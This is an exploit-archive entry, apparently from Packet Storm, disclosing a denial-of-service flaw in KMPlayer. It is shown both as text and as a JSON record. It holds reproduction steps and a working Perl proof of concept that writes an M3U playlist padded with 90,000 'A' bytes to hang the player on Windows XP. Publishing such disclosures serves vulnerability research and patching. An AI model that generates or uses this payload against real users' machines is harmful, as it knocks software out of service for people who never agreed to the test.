ID PACKETSTORM:119833 Type packetstorm Reporter Jigsaw Modified 2013-01-25T00:00:00
Description
`Title : KMPlayer (PlayList M3U) Denial Of Service PoC All Versions
Author : Jigsaw (Abdelmorite Eljoaydi)
Date : 26-01-2013
E-mail : jigsaw0658@gmail.com
Home : Morroco
Facebook page : facebook.com/abdelmorit.alma
platform : software
Impact : Denial Of Service
Tested on : KMPlayer (http://www.kmpmedia.net/) Version 3.2-3.3-3.4 and 3.5.00.77
OS : Tested on Windows XP SP1,SP2 and SP3 'Windows 7 is not Vulnerable' other OS maybe Vulnerable
Risk : Low[+] / Medium[-]
====How to reproduce====
When creating a file with the poc below , you'll have to open the playlist file in kmplayer , a box will pop up just press OK . After that press the play button to trigger the DOS vulnerability . The program will not be able to respond until the process is killed using the task manager .
=========Proof of concept===========
#!/usr/bin/perl
my $j = "\x41" x 90000;
my $h = "\x4D\x33\x55";
my $file = "kmplayer.m3u";
open ($File, ">$file");
print $File $h.$j;
close ($File);
====================================
`
{"id": "PACKETSTORM:119833", "type": "packetstorm", "bulletinFamily": "exploit", "title": "KMPlayer 3.5.0.77 Denial Of Service", "description": "", "published": "2013-01-25T00:00:00", "modified": "2013-01-25T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/119833/KMPlayer-3.5.0.77-Denial-Of-Service.html", "reporter": "Jigsaw", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:29:26", "viewCount": 1, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2016-11-03T10:29:26", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:29:26", "rev": 2}, "vulnersScore": 0.2}, "sourceHref": "https://packetstormsecurity.com/files/download/119833/kmplayer-dos.txt", "sourceData": "`Title : KMPlayer (PlayList M3U) Denial Of Service PoC All Versions \nAuthor : Jigsaw (Abdelmorite Eljoaydi) \nDate : 26-01-2013 \nE-mail : jigsaw0658@gmail.com \nHome : Morroco \nFacebook page : facebook.com/abdelmorit.alma \nplatform : software \nImpact : Denial Of Service \nTested on : KMPlayer (http://www.kmpmedia.net/) Version 3.2-3.3-3.4 and 3.5.00.77 \nOS : Tested on Windows XP SP1,SP2 and SP3 'Windows 7 is not Vulnerable' other OS maybe Vulnerable \nRisk : Low[+] / Medium[-] \n \n====How to reproduce==== \nWhen creating a file with the poc below , you'll have to open the playlist file in kmplayer , a box will pop up just press OK . After that press the play button to trigger the DOS vulnerability . The program will not be able to respond until the process is killed using the task manager . \n \n=========Proof of concept=========== \n#!/usr/bin/perl \nmy $j = \"\\x41\" x 90000; \nmy $h = \"\\x4D\\x33\\x55\"; \nmy $file = \"kmplayer.m3u\"; \nopen ($File, \">$file\"); \nprint $File $h.$j; \nclose ($File); \n==================================== \n`\n"}